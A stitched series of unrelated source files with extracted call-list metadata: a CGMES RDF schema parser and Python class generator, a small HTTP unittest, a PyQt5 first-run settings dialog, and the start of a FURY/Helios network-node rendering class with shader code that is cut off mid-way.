{}), '(years, months, days, hours, minutes, seconds, arr)\n', (21765, 21816), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((12388, 12402), 'numpy.abs', 'np.abs', (['in_lat'], {}), '(in_lat)\n', (12394, 12402), True, 'import numpy as np\n')] |
import os
import xmltodict
from time import time
import json
import logging
logger = logging.getLogger(__name__)
class RDFSEntry:
def __init__(self, jsonObject):
self.jsonDefinition = jsonObject
return
def asJson(self):
jsonObject = {}
if self.about() != None:
jsonObject['about'] = self.about()
if self.comment() != None:
jsonObject['comment'] = self.comment()
if self.dataType() != None:
jsonObject['dataType'] = self.dataType()
if self.domain() != None:
jsonObject['domain'] = self.domain()
if self.fixed() != None:
jsonObject['isFixed'] = self.fixed()
if self.label() != None:
jsonObject['label'] = self.label()
if self.multiplicity() != None:
jsonObject['multiplicity'] = self.multiplicity()
if self.range() != None:
jsonObject['range'] = self.range()
if self.stereotype() != None:
jsonObject['stereotype'] = self.stereotype()
if self.type() != None:
jsonObject['type'] = self.type()
if self.subClassOf() != None:
jsonObject['subClassOf'] = self.subClassOf()
if self.inverseRole() != None:
jsonObject['inverseRole'] = self.inverseRole()
if self.associationUsed() != None:
jsonObject['associationUsed'] = self.associationUsed()
return jsonObject
def about(self):
if '$rdf:about' in self.jsonDefinition:
return RDFSEntry._get_rid_of_hash(RDFSEntry._get_about_or_resource(self.jsonDefinition['$rdf:about']))
else:
return None
def associationUsed(self):
if 'cims:AssociationUsed' in self.jsonDefinition:
return RDFSEntry._extract_string(self.jsonDefinition['cims:AssociationUsed'])
else:
return None
def comment(self):
if 'rdfs:comment' in self.jsonDefinition:
return RDFSEntry._extract_text(self.jsonDefinition['rdfs:comment']).replace('–', '-').replace('“', '"')\
.replace('”', '"').replace('’', "'").replace('°', '[SYMBOL REMOVED]').replace('º', '[SYMBOL REMOVED]').replace('\n', ' ')
else:
return None
def dataType(self):
if 'cims:dataType' in self.jsonDefinition:
return RDFSEntry._extract_string(self.jsonDefinition['cims:dataType'])
else:
return None
def domain(self):
if 'rdfs:domain' in self.jsonDefinition:
return RDFSEntry._get_rid_of_hash(RDFSEntry._extract_string(self.jsonDefinition['rdfs:domain']))
else:
return None
def fixed(self):
if 'cims:isFixed' in self.jsonDefinition:
return RDFSEntry._get_literal(self.jsonDefinition['cims:isFixed'])
else:
return None
def inverseRole(self):
if 'cims:inverseRoleName' in self.jsonDefinition:
return RDFSEntry._get_rid_of_hash(RDFSEntry._extract_string(self.jsonDefinition['cims:inverseRoleName']))
else:
return None
def label(self):
if 'rdfs:label' in self.jsonDefinition:
return RDFSEntry._extract_text(self.jsonDefinition['rdfs:label']).replace('–', '-').replace('“', '"')\
.replace('”', '"').replace('’', "'").replace('°', '').replace('\n', ' ')
else:
return None
def multiplicity(self):
if 'cims:multiplicity' in self.jsonDefinition:
return RDFSEntry._get_rid_of_hash(RDFSEntry._extract_string(self.jsonDefinition['cims:multiplicity']))
else:
return None
def range(self):
if 'rdfs:range' in self.jsonDefinition:
return RDFSEntry._extract_string(self.jsonDefinition['rdfs:range'])
else:
return None
def stereotype(self):
if 'cims:stereotype' in self.jsonDefinition:
return RDFSEntry._extract_string(self.jsonDefinition['cims:stereotype'])
else:
return None
def type(self):
if 'rdf:type' in self.jsonDefinition:
return RDFSEntry._extract_string(self.jsonDefinition['rdf:type'])
else:
return None
def subClassOf(self):
if 'rdfs:subClassOf' in self.jsonDefinition:
return RDFSEntry._get_rid_of_hash(RDFSEntry._extract_string(self.jsonDefinition['rdfs:subClassOf']))
else:
return None
# Extracts the text out of the dictionary after xmltodict, text is labeled by key '_'
def _extract_text(object_dic):
if isinstance(object_dic, list):
return object_dic[0]['_']
elif '_' in object_dic.keys():
return object_dic['_']
else:
return ""
# Extract String out of list or dictionary
def _extract_string(object_dic):
if isinstance(object_dic, list):
if len(object_dic) > 0:
if type(object_dic[0]) == 'string' or isinstance(object_dic[0], str):
return object_dic[0]
return RDFSEntry._get_about_or_resource(object_dic[0])
return RDFSEntry._get_about_or_resource(object_dic)
    # Fixed values are wrapped in an object keyed by "$rdfs:Literal";
    # this extracts the literal value if present
def _get_literal(object_dic):
if '$rdfs:Literal' in object_dic:
return object_dic['$rdfs:Literal']
return object_dic
# The definitions are often contained within a string with a name
# such as "$rdf:about" or "$rdf:resource", this extracts the
# useful bit
def _get_about_or_resource(object_dic):
if '$rdf:resource' in object_dic:
return object_dic['$rdf:resource']
elif '$rdf:about' in object_dic:
return object_dic['$rdf:about']
elif '$rdfs:Literal' in object_dic:
return object_dic['$rdfs:Literal']
return object_dic
# Some names are encoded as #name or http://some-url#name
# This function returns the name
def _get_rid_of_hash(name):
tokens = name.split('#')
if len(tokens) == 1:
return tokens[0]
if len(tokens) > 1:
return tokens[1]
return name
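# Illustrative sketch (not part of the original module); the CIM names are
# hypothetical:
#   RDFSEntry._get_rid_of_hash('#Terminal')                        -> 'Terminal'
#   RDFSEntry._get_rid_of_hash('http://example.org/CIM#Terminal')  -> 'Terminal'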
class CIMComponentDefinition:
def __init__(self, rdfsEntry):
self.attribute_list = []
self.comment = rdfsEntry.comment()
self.instance_list = []
self.origin_list = []
self.super = rdfsEntry.subClassOf()
self.subclasses = []
def attributes(self):
return self.attribute_list
def addAttribute(self, attribute):
self.attribute_list.append(attribute)
def has_instances(self):
return len(self.instance_list) > 0
def instances(self):
return self.instance_list
def addInstance(self, instance):
instance['index'] = len(self.instance_list)
self.instance_list.append(instance)
def addAttributes(self, attributes):
for attribute in attributes:
self.attribute_list.append(attribute)
def origins(self):
return self.origin_list
def addOrigin(self, origin):
self.origin_list.append(origin)
def superClass(self):
return self.super
def addSubClass(self, name):
self.subclasses.append(name)
def subClasses(self):
return self.subclasses
def setSubClasses(self, classes):
self.subclasses = classes
def _simple_float_attribute(attr):
if 'dataType' in attr:
return attr['label'] == 'value' and attr['dataType'] == '#Float'
return False
def is_a_float(self):
simple_float = False
for attr in self.attribute_list:
if CIMComponentDefinition._simple_float_attribute(attr):
simple_float = True
for attr in self.attribute_list:
if not CIMComponentDefinition._simple_float_attribute(attr):
simple_float = False
if simple_float:
return True
candidate_array = { 'value': False, 'unit': False, 'multiplier': False }
for attr in self.attribute_list:
key = attr['label']
if key in candidate_array:
candidate_array[key] = True
else:
return False
for key in candidate_array:
if candidate_array[key] == False:
return False
return True
def get_profile_name(descriptions):
for list_elem in descriptions:
# only for CGMES-Standard
rdfsEntry = RDFSEntry(list_elem)
if rdfsEntry.stereotype() == 'Entsoe':
return rdfsEntry.about()
def get_short_profile_name(descriptions):
for list_elem in descriptions:
# only for CGMES-Standard
rdfsEntry = RDFSEntry(list_elem)
if rdfsEntry.label() == 'shortName':
return rdfsEntry.fixed()
short_package_name = {}
def _parse_rdf(input_dic):
classes_map = {}
package_name = []
attributes = []
instances = []
# Generates list with dictionaries as elements
descriptions = input_dic['rdf:RDF']['rdf:Description']
short_package_name[get_profile_name(descriptions)] = get_short_profile_name(descriptions)
# Iterate over list elements
for list_elem in descriptions:
rdfsEntry = RDFSEntry(list_elem)
object_dic = rdfsEntry.asJson()
if rdfsEntry.type() != None:
if rdfsEntry.type() == 'http://www.w3.org/2000/01/rdf-schema#Class':
# Class
if rdfsEntry.label() in classes_map:
logger.info("Class {} already exists".format(rdfsEntry.label()))
if rdfsEntry.label() != "String":
                    classes_map[rdfsEntry.label()] = CIMComponentDefinition(rdfsEntry)
elif rdfsEntry.type() == "http://www.w3.org/1999/02/22-rdf-syntax-ns#Property":
# Property -> Attribute
# We might not have read all the classes yet, so we just make a big list of all attributes
attributes.append(object_dic)
elif rdfsEntry.type() != "http://iec.ch/TC57/1999/rdf-schema-extensions-19990926#ClassCategory":
instances.append(object_dic)
# only for CGMES-Standard
if rdfsEntry.stereotype() != None:
if rdfsEntry.stereotype() == 'Entsoe':
# Record the type, which will be [PackageName]Version
package_name.append(rdfsEntry.about())
# Add attributes to corresponding class
for attribute in attributes:
clarse = attribute['domain']
        if clarse and clarse in classes_map:
classes_map[clarse].addAttribute(attribute)
else:
logger.info("Class {} for attribute {} not found.".format(clarse, attribute))
# Add instances to corresponding class
for instance in instances:
clarse = RDFSEntry._get_rid_of_hash(instance['type'])
if clarse and clarse in classes_map:
classes_map[clarse].addInstance(instance)
else:
logger.info("Class {} for instance {} not found.".format(clarse, instance))
return {package_name[0]: classes_map}
# This function extracts all information needed for the creation of the python class files like the comments or the
# class name. After the extraction the function write_files is called to write the files with the template engine
# chevron
def _write_python_files(elem_dict, langPack, outputPath, version):
float_classes = {}
enum_classes = {}
# Iterate over Classes
for class_definition in elem_dict:
if elem_dict[class_definition].is_a_float():
float_classes[class_definition] = True
if elem_dict[class_definition].has_instances():
enum_classes[class_definition] = True
langPack.set_float_classes(float_classes)
langPack.set_enum_classes(enum_classes)
for class_name in elem_dict.keys():
class_details = {
"attributes": _find_multiple_attributes(elem_dict[class_name].attributes()),
"ClassLocation": langPack.get_class_location(class_name, elem_dict, outputPath),
"class_name": class_name,
"class_origin": elem_dict[class_name].origins(),
"instances": elem_dict[class_name].instances(),
"has_instances": elem_dict[class_name].has_instances(),
"is_a_float": elem_dict[class_name].is_a_float(),
"langPack": langPack,
"sub_class_of": elem_dict[class_name].superClass(),
"sub_classes": elem_dict[class_name].subClasses(),
}
# extract comments
if elem_dict[class_name].comment:
class_details['class_comment'] = elem_dict[class_name].comment
for attribute in class_details['attributes']:
if "comment" in attribute:
attribute["comment"] = attribute["comment"].replace('"', "`")
attribute["comment"] = attribute["comment"].replace("'", "`")
_write_files(class_details, outputPath, version)
def get_rid_of_hash(name):
tokens = name.split('#')
if len(tokens) == 1:
return tokens[0]
if len(tokens) > 1:
return tokens[1]
return name
def format_class(_range, _dataType):
if _range == '':
return get_rid_of_hash(_dataType)
else:
return get_rid_of_hash(_range)
def _write_files(class_details, outputPath, version):
class_details['langPack'].setup(outputPath)
if class_details['sub_class_of'] == None:
# If class has no subClassOf key it is a subclass of the Base class
class_details['sub_class_of'] = class_details['langPack'].base['base_class']
class_details['class_location'] = class_details['langPack'].base['class_location'](version)
class_details['super_init'] = False
else:
# If class is a subclass a super().__init__() is needed
class_details['super_init'] = True
# The entry dataType for an attribute is only set for basic data types. If the entry is not set here, the attribute
# is a reference to another class and therefore the entry dataType is generated and set to the multiplicity
for i in range(len(class_details['attributes'])):
if 'dataType' not in class_details['attributes'][i].keys() and 'multiplicity' in class_details['attributes'][i].keys():
class_details['attributes'][i]['dataType'] = class_details['attributes'][i]['multiplicity']
for attr in class_details['attributes']:
_range = ""
_dataType = ""
if 'range' in attr:
_range = attr['range']
if 'dataType' in attr:
_dataType = attr['dataType']
        attr['class_name'] = format_class(_range, _dataType)
    class_details['langPack'].run_template(outputPath, class_details)
# Find multiple entries for the same attribute
def _find_multiple_attributes(attributes_array):
merged_attributes = []
for elem in attributes_array:
found = False
for i in range(len(merged_attributes)):
if elem['label'] == merged_attributes[i]['label']:
found = True
break
if found is False:
merged_attributes.append(elem)
return merged_attributes
# If multiple CGMES schema files for one profile are read, e.g. Equipment Core and Equipment Core Short Circuit
# this function merges these into one profile, e.g. Equipment, after this function only one dictionary entry for each
# profile exists. The profiles_array contains one entry for each CGMES schema file which was read.
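# Illustrative sketch (assumed toy input): two schema reads of the same profile collapse into one entry, e.g.
#   [{'Equipment': {'ACLineSegment': clsA}}, {'Equipment': {'Breaker': clsB}}]
#   -> {'Equipment': {'ACLineSegment': clsA, 'Breaker': clsB}}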
def _merge_profiles(profiles_array):
profiles_dict = {}
# Iterate through array elements
for elem_dict in profiles_array:
# Iterate over profile names
for profile_key in elem_dict.keys():
if profile_key in profiles_dict.keys():
# Iterate over classes and check for multiple class definitions
for class_key in elem_dict[profile_key]:
if class_key in profiles_dict[profile_key].keys():
# If class already exists in packageDict add attributes to attributes array
if len(elem_dict[profile_key][class_key].attributes()) > 0:
attributes_array = elem_dict[profile_key][class_key].attributes()
profiles_dict[profile_key][class_key].addAttributes(attributes_array)
# If class is not in packageDict, create entry
else:
profiles_dict[profile_key][class_key] = elem_dict[profile_key][class_key]
# If package name not in packageDict create entry
else:
profiles_dict[profile_key] = elem_dict[profile_key]
return profiles_dict
# This function merges the classes defined in all profiles into one class with all attributes defined in any profile.
# The origin of the class definitions and the origin of the attributes of a class are tracked and used to generate
# the possibleProfileList used for the serialization.
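# Illustrative sketch (hypothetical short profile names): a class defined in two profiles keeps a single entry
#   whose origins list becomes e.g. [{'origin': 'EQ'}, {'origin': 'TP'}], and every attribute carries its own
#   attr_origin list built the same way.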
def _merge_classes(profiles_dict):
class_dict = {}
# Iterate over profiles
for package_key in profiles_dict.keys():
# get short name of the profile
short_name = ""
if package_key in short_package_name:
if type(short_package_name[package_key]) is dict and '_' in short_package_name[package_key]:
short_name = short_package_name[package_key]['_']
else:
short_name = short_package_name[package_key]
else:
short_name = package_key
# iterate over classes in the current profile
for class_key in profiles_dict[package_key]:
# class already defined?
if class_key not in class_dict:
# store class and class origin
class_dict[class_key] = profiles_dict[package_key][class_key]
class_dict[class_key].addOrigin({'origin': short_name})
for attr in class_dict[class_key].attributes():
# store origin of the attributes
attr['attr_origin'] = [{'origin': short_name}]
else:
# some inheritance information is stored only in one of the packages. Therefore it has to be checked
# if the subClassOf attribute is set. See for example TopologicalNode definitions in SV and TP.
if not class_dict[class_key].superClass():
if profiles_dict[package_key][class_key].superClass():
class_dict[class_key].super = profiles_dict[package_key][class_key].superClass()
# check if profile is already stored in class origin list
multiple_origin = False
for origin in class_dict[class_key].origins():
if short_name == origin['origin']:
# origin already stored
multiple_origin = True
break
if not multiple_origin:
class_dict[class_key].addOrigin({'origin': short_name})
for attr in profiles_dict[package_key][class_key].attributes():
# check if attribute is already in attributes list
multiple_attr = False
for attr_set in class_dict[class_key].attributes():
if attr['label'] == attr_set['label']:
# attribute already in attributes list, check if origin is new
multiple_attr = True
for origin in attr_set['attr_origin']:
multiple_attr_origin = False
if origin['origin'] == short_name:
multiple_attr_origin = True
break
if not multiple_attr_origin:
# new origin
attr_set['attr_origin'].append({'origin': short_name})
break
if not multiple_attr:
# new attribute
attr['attr_origin'] = [{'origin': short_name}]
class_dict[class_key].addAttribute(attr)
return class_dict
def recursivelyAddSubClasses(class_dict, class_name):
newSubClasses = []
theClass = class_dict[class_name]
for name in theClass.subClasses():
newSubClasses.append(name)
newNewSubClasses = recursivelyAddSubClasses(class_dict, name)
newSubClasses = newSubClasses + newNewSubClasses
return newSubClasses
def addSubClassesOfSubClasses(class_dict):
for className in class_dict:
class_dict[className].setSubClasses(recursivelyAddSubClasses(class_dict, className))
def cim_generate(directory, outputPath, version, langPack):
"""Generates cgmes python classes from cgmes ontology
This function uses package xmltodict to parse the RDF files. The parse_rdf function sorts the classes to
the corresponding packages. Since multiple files can be read, e.g. Equipment Core and Equipment Short Circuit, the
classes of these profiles are merged into one profile with the merge_profiles function. After that the merge_classes
function merges classes defined in multiple profiles into one class and tracks the origin of the class and their
attributes. This information is stored in the class variable possibleProfileList and used for serialization.
For more information see the cimexport function in the cimpy package. Finally the
write_python_files function extracts all information needed for the creation of the python files and creates them
with the template engine chevron. The attribute version of this function defines the name of the folder where the
created classes are stored. This folder should not exist and is created in the class generation procedure.
:param directory: path to RDF files containing cgmes ontology, e.g. directory = "./examples/cgmes_schema/cgmes_v2_4_15_schema"
    :param outputPath: directory where the generated class files are written
    :param version: CGMES version, e.g. version = "cgmes_v2_4_15"
:param langPack: python module containing language specific functions
"""
profiles_array = []
t0 = time()
# iterate over files in the directory and check if they are RDF files
for file in os.listdir(directory):
if file.endswith(".rdf"):
logger.info('Start of parsing file \"%s\"', file)
file_path = os.path.join(directory, file)
xmlstring = open(file_path, encoding="utf8").read()
# parse RDF files and create a dictionary from the RDF file
parse_result = xmltodict.parse(xmlstring, attr_prefix="$", cdata_key="_", dict_constructor=dict)
parsed = _parse_rdf(parse_result)
profiles_array.append(parsed)
# merge multiple profile definitions into one profile
profiles_dict = _merge_profiles(profiles_array)
# merge classes from different profiles into one class and track origin of the classes and their attributes
class_dict_with_origins = _merge_classes(profiles_dict)
# work out the subclasses for each class by noting the reverse relationship
for className in class_dict_with_origins:
        superClassName = class_dict_with_origins[className].superClass()
        if superClassName is not None:
            if superClassName in class_dict_with_origins:
                superClass = class_dict_with_origins[superClassName]
superClass.addSubClass(className)
else:
print("No match for superClass in dict: :", superClassName)
# recursively add the subclasses of subclasses
addSubClassesOfSubClasses(class_dict_with_origins)
# get information for writing python files and write python files
_write_python_files(class_dict_with_origins, langPack, outputPath, version)
logger.info('Elapsed Time: {}s\n\n'.format(time() - t0))
| [
"logging.getLogger",
"os.listdir",
"xmltodict.parse",
"os.path.join",
"time.time"
] | [((86, 113), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (103, 113), False, 'import logging\n'), ((22466, 22472), 'time.time', 'time', ([], {}), '()\n', (22470, 22472), False, 'from time import time\n'), ((22564, 22585), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (22574, 22585), False, 'import os\n'), ((22708, 22737), 'os.path.join', 'os.path.join', (['directory', 'file'], {}), '(directory, file)\n', (22720, 22737), False, 'import os\n'), ((22902, 22988), 'xmltodict.parse', 'xmltodict.parse', (['xmlstring'], {'attr_prefix': '"""$"""', 'cdata_key': '"""_"""', 'dict_constructor': 'dict'}), "(xmlstring, attr_prefix='$', cdata_key='_', dict_constructor\n =dict)\n", (22917, 22988), False, 'import xmltodict\n'), ((24171, 24177), 'time.time', 'time', ([], {}), '()\n', (24175, 24177), False, 'from time import time\n')] |
import unittest
import requests
from tests.functional.api.testing_utils import base_url
from uuid import uuid4
class TestCatchAll(unittest.TestCase):
def test_root(self):
resp = requests.get(base_url)
self.assertEqual(404, resp.status_code)
# TODO test fails
# def test_sub_path(self):
# resp = requests.get(base_url+"/"+uuid4().hex)
# self.assertEqual(404, resp.status_code)
| [
"requests.get"
] | [((193, 215), 'requests.get', 'requests.get', (['base_url'], {}), '(base_url)\n', (205, 215), False, 'import requests\n')] |
import os
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QDialog, QFileDialog
import Utils
from Configuration import Configuration
from ui.ui_designer.ui_file.uic_initDialog import Ui_initDialog
class InitDialog(QDialog):
"""
    Registration dialog
    Used to perform some initial settings the first time the app is opened
"""
def __init__(self):
super().__init__()
self.config = Configuration()
self.initForm = Ui_initDialog()
self.initForm.setupUi(self)
        # Show only the close button in the title bar
self.setWindowFlags(Qt.CustomizeWindowHint | Qt.WindowCloseButtonHint)
        # Window icon
self.setWindowIcon(QIcon('resource/imgs/logo.png'))
        # Connect signals and slots
self.do_connect()
pass
def do_connect(self):
self.initForm.btnFinished.clicked.connect(self._finished)
self.initForm.btnChoosePlayer.clicked.connect(self._choosePlayer)
self.initForm.btnChooseIDM.clicked.connect(self._chooseIDM)
pass
def _choosePlayer(self):
fileName_choose, filetype = QFileDialog.getOpenFileName(self,
'选择播放器',
'./',
"播放器 (*exe);")
if fileName_choose != '':
self.initForm.lblPlayer.setText(fileName_choose)
pass
def _chooseIDM(self):
fileName_choose, filetype = QFileDialog.getOpenFileName(self,
'选择下载器',
'./',
"下载器 (*exe);")
if fileName_choose != '':
self.initForm.lblIDM.setText(fileName_choose)
pass
def _finished(self):
        # Record the three values
user_name = self.initForm.txtUserName.text()
player = self.initForm.lblPlayer.text()
idm = self.initForm.lblIDM.text()
print(user_name, player, idm)
if user_name.strip() == '':
user_name = 'Master'
if player == "无":
player = None
if idm == "无":
idm = None
self.config.user_name = user_name.strip()
self.config.player_pot_path = player
self.config.idm_path = idm
self.config.first_open = False
self.config.save()
Utils.restart_program()
pass
def _closeApp(self):
# noinspection PyProtectedMember
os._exit(0)
pass
pass
| [
"PyQt5.QtGui.QIcon",
"ui.ui_designer.ui_file.uic_initDialog.Ui_initDialog",
"os._exit",
"Utils.restart_program",
"PyQt5.QtWidgets.QFileDialog.getOpenFileName",
"Configuration.Configuration"
] | [((387, 402), 'Configuration.Configuration', 'Configuration', ([], {}), '()\n', (400, 402), False, 'from Configuration import Configuration\n'), ((427, 442), 'ui.ui_designer.ui_file.uic_initDialog.Ui_initDialog', 'Ui_initDialog', ([], {}), '()\n', (440, 442), False, 'from ui.ui_designer.ui_file.uic_initDialog import Ui_initDialog\n'), ((1021, 1084), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""选择播放器"""', '"""./"""', '"""播放器 (*exe);"""'], {}), "(self, '选择播放器', './', '播放器 (*exe);')\n", (1048, 1084), False, 'from PyQt5.QtWidgets import QDialog, QFileDialog\n'), ((1448, 1511), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""选择下载器"""', '"""./"""', '"""下载器 (*exe);"""'], {}), "(self, '选择下载器', './', '下载器 (*exe);')\n", (1475, 1511), False, 'from PyQt5.QtWidgets import QDialog, QFileDialog\n'), ((2406, 2429), 'Utils.restart_program', 'Utils.restart_program', ([], {}), '()\n', (2427, 2429), False, 'import Utils\n'), ((2518, 2529), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (2526, 2529), False, 'import os\n'), ((618, 649), 'PyQt5.QtGui.QIcon', 'QIcon', (['"""resource/imgs/logo.png"""'], {}), "('resource/imgs/logo.png')\n", (623, 649), False, 'from PyQt5.QtGui import QIcon\n')] |
"""VTK Super Actors
This module contains the VTK super actors to be used in the
network visualization.
"""
import numpy as np
from fury.shaders import add_shader_callback, attribute_to_actor
from fury.shaders import shader_to_actor, load
import fury.primitive as fp
from fury.utils import get_actor_from_primitive
from fury.utils import vertices_from_actor, array_from_actor
from fury.utils import update_actor
from fury.actor import line as line_actor
try:
from fury.shaders import shader_apply_effects
except ImportError:
shader_apply_effects = None
from fury import window
from helios.backends.fury.tools import Uniform, Uniforms
_MARKER2Id = {
'o': 0, 's': 1, 'd': 2, '^': 3, 'p': 4,
'h': 5, 's6': 6, 'x': 7, '+': 8, '3d': 0}
class FurySuperNode:
def __init__(
self,
positions,
colors=(0, 1, 0),
scales=1,
marker='3d',
edge_width=.0,
edge_opacity=1,
edge_color=(1, 1, 1),
marker_opacity=.8,
write_frag_depth=True
):
self._vcount = positions.shape[0]
self._composed_by_superactors = False
# to avoid any kind of expansive calculations when we
# are dealing with just 2d markers
self._marker_is_3d = marker == '3d'
self._write_frag_depth = write_frag_depth
self._marker_is_uniform = isinstance(marker, str)
self._marker = marker if self._marker_is_uniform else None
self._edge_color_is_uniform = len(edge_color) == 3
self._edge_opacity_is_uniform = isinstance(edge_opacity, (float, int))
self._marker_opacity_is_uniform = isinstance(
marker_opacity, (float, int))
self._edge_width_is_uniform = isinstance(edge_width, (float, int))
# self._edge_color_is_uniform = len(edge_color) == 3
self._positions_is_uniform = False
self._init_actor(
positions.shape[0], colors, scales)
self.positions = positions
self.uniforms_list = []
self._init_marker_property(marker)
self._init_edge_width_property(edge_width)
self._init_edge_color_property(edge_color)
self._init_edge_opacity_property(edge_opacity)
self._init_marker_opacity_property(marker_opacity)
self._init_specular_strength_property(25)
self._init_specular_mix_property(1.)
self._init_shadow_mix_property(0.25)
if len(self.uniforms_list) > 0:
self.Uniforms = Uniforms(self.uniforms_list)
self.uniforms_observerId = add_shader_callback(
self.vtk_actor, self.Uniforms)
self._init_shader_frag()
self.blending = 'additive'
self.depth_test = True
self._id_observer_effects = None
def start_effects(self, render_window):
if self._id_observer_effects is not None:
self.vtk_actor.GetMapper().RemoveObserver(
self._id_observer_effects)
effects = []
if self.depth_test:
effects += [window.gl_enable_depth]
else:
effects += [window.gl_disable_depth]
blendings = {
'additive': window.gl_set_additive_blending,
'subtractive': window.gl_set_subtractive_blending,
'multiplicative': window.gl_set_multiplicative_blending,
'normal': window.gl_set_normal_blending,
}
effects += [blendings[self.blending]]
self._id_observer_effects = shader_apply_effects(
render_window, self.vtk_actor,
effects=effects)
def _init_actor(self, num_nodes, colors, scales):
# to avoid memory corruption
centers = np.zeros((num_nodes, 3))
verts, faces = fp.prim_square()
res = fp.repeat_primitive(
verts, faces, centers=centers,
colors=colors,
scales=scales)
big_verts, big_faces, big_colors, big_centers = res
actor = get_actor_from_primitive(
big_verts, big_faces, big_colors)
actor.GetMapper().SetVBOShiftScaleMethod(False)
actor.GetProperty().BackfaceCullingOff()
attribute_to_actor(actor, big_centers, 'center')
self._centers_geo = array_from_actor(actor, array_name="center")
self._centers_geo_orig = np.array(self._centers_geo)
self._centers_length = int(self._centers_geo.shape[0] / num_nodes)
self._verts_geo = vertices_from_actor(actor)
self._verts_geo_orig = np.array(self._verts_geo)
self._colors_geo = array_from_actor(actor, array_name="colors")
self.vtk_actor = actor
# update to correct positions
def _init_marker_property(self, data):
if self._marker_is_uniform:
if isinstance(data, str):
data = _MARKER2Id[data]
self.uniforms_list.append(
Uniform(
name='marker', uniform_type='f', value=data))
else:
if isinstance(data[0], str):
data = [_MARKER2Id[i] for i in data]
data = np.repeat(data, 4).astype('float')
attribute_to_actor(
self.vtk_actor,
data, 'vMarker')
self._marker = array_from_actor(
self.vtk_actor, array_name="vMarker")
def _init_edge_color_property(self, edge_color):
if self._edge_color_is_uniform:
self.uniforms_list.append(
Uniform(
name='edgeColor', uniform_type='3f', value=edge_color))
else:
edge_color_by_vertex = np.repeat(
edge_color, 4, axis=0).astype('float')
attribute_to_actor(
self.vtk_actor,
edge_color_by_vertex,
'vEdgeColor')
self._edge_color = array_from_actor(
self.vtk_actor, array_name="vEdgeColor")
def _init_edge_width_property(self, edge_width):
if self._edge_width_is_uniform:
self.uniforms_list.append(
Uniform(
name='edgeWidth', uniform_type='f', value=edge_width))
else:
edge_width_by_vertex = np.repeat(edge_width, 4).astype('float')
attribute_to_actor(
self.vtk_actor,
edge_width_by_vertex,
'vEdgeWidth')
self._edge_width = array_from_actor(
self.vtk_actor, array_name="vEdgeWidth")
def _init_edge_opacity_property(self, opacity):
if self._edge_opacity_is_uniform:
self.uniforms_list.append(
Uniform(
name='edgeOpacity', uniform_type='f', value=opacity))
else:
edge_opacity_by_vertex = np.repeat(opacity, 4).astype('float')
attribute_to_actor(
self.vtk_actor,
edge_opacity_by_vertex,
'vEdgeOpacity')
self._edge_opacity = array_from_actor(
self.vtk_actor, array_name="vEdgeOpacity")
def _init_marker_opacity_property(self, opacity):
if self._marker_opacity_is_uniform:
self.uniforms_list.append(
Uniform(
name='markerOpacity', uniform_type='f', value=opacity))
else:
marker_opacity_by_vertex = np.repeat(opacity, 4).astype('float')
attribute_to_actor(
self.vtk_actor,
marker_opacity_by_vertex,
'vMarkerOpacity')
self._marker_opacity = array_from_actor(
self.vtk_actor, array_name="vMarkerOpacity")
def _init_specular_strength_property(self, value):
if self._marker_opacity_is_uniform:
self.uniforms_list.append(
Uniform(
name='specularStrength', uniform_type='f', value=value))
def _init_shadow_mix_property(self, value):
if self._marker_opacity_is_uniform:
self.uniforms_list.append(
Uniform(
name='shadowMix', uniform_type='f', value=value))
def _init_specular_mix_property(self, value):
if self._marker_opacity_is_uniform:
self.uniforms_list.append(
Uniform(
name='specularMix', uniform_type='f', value=value))
@property
def shader_dec_vert(self):
shader = load("billboard_dec.vert")
if not self._marker_is_3d and not self._marker_is_uniform:
shader += """
in float vMarker;\n
out float marker;\n"""
if not self._edge_width_is_uniform:
shader += 'in float vEdgeWidth; \nout float edgeWidth;\n'
if not self._edge_color_is_uniform:
shader += 'in vec3 vEdgeColor;\n out vec3 edgeColor;\n'
if not self._edge_opacity_is_uniform:
shader += 'in float vEdgeOpacity;\n out float edgeOpacity;\n'
if not self._marker_opacity_is_uniform:
shader += 'in float vMarkerOpacity;\n out float markerOpacity;\n'
return shader
@property
def shader_impl_vert(self):
shader = load("billboard_impl.vert")
if not self._marker_is_3d and not self._marker_is_uniform:
shader += "marker = vMarker;\n"
if not self._edge_width_is_uniform:
shader += 'edgeWidth = vEdgeWidth;\n'
        if not self._edge_color_is_uniform:
shader += 'edgeColor = vEdgeColor;\n'
if not self._edge_opacity_is_uniform:
shader += 'edgeOpacity = vEdgeOpacity;\n'
        if not self._marker_opacity_is_uniform:
shader += 'markerOpacity = vMarkerOpacity;\n'
return shader
@property
def shader_dec_frag(self):
shader = load("billboard_dec.frag")
if self._marker_opacity_is_uniform:
shader += "uniform float markerOpacity;\n"
else:
shader += 'in float markerOpacity;\n'
if self._edge_opacity_is_uniform:
shader += "uniform float edgeOpacity;\n"
else:
shader += 'in float edgeOpacity;\n'
if self._edge_width_is_uniform:
shader += "uniform float edgeWidth;\n"
else:
shader += 'in float edgeWidth;\n'
if self._edge_color_is_uniform:
shader += "uniform vec3 edgeColor;\n"
else:
shader += 'in vec3 edgeColor;\n'
if self._marker_is_uniform:
shader += "uniform float marker;\n"
else:
shader += "in float marker;\n"
shader += "uniform float specularStrength;\n"
shader += "uniform float specularMix;\n"
shader += "uniform float shadowMix;\n"
shader += """
uniform mat4 MCDCMatrix;
uniform mat4 MCVCMatrix;
float ndot(vec2 a, vec2 b ) {
return a.x*b.x - a.y*b.y;
}
vec3 getDistFunc0(vec2 p, float s, float edgeWidth){
//circle or sphere sdf func
float sdf = 0;
float minSdf = 0;
edgeWidth = edgeWidth/2.;
minSdf = 0.5;
sdf = -length(p) + s;
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc1(vec2 p, float s, float edgeWidth){
//square sdf func
edgeWidth = edgeWidth/2.;
float minSdf = 0.5/2.0;
vec2 d = abs(p) - vec2(s, s);
float sdf = -length(max(d,0.0)) - min(max(d.x,d.y),0.0);
vec3 result = vec3(sdf, minSdf, edgeWidth);
return result ;
}
vec3 getDistFunc2(vec2 p, float s, float edgeWidth){
//diamond sdf func
edgeWidth = edgeWidth/4.;
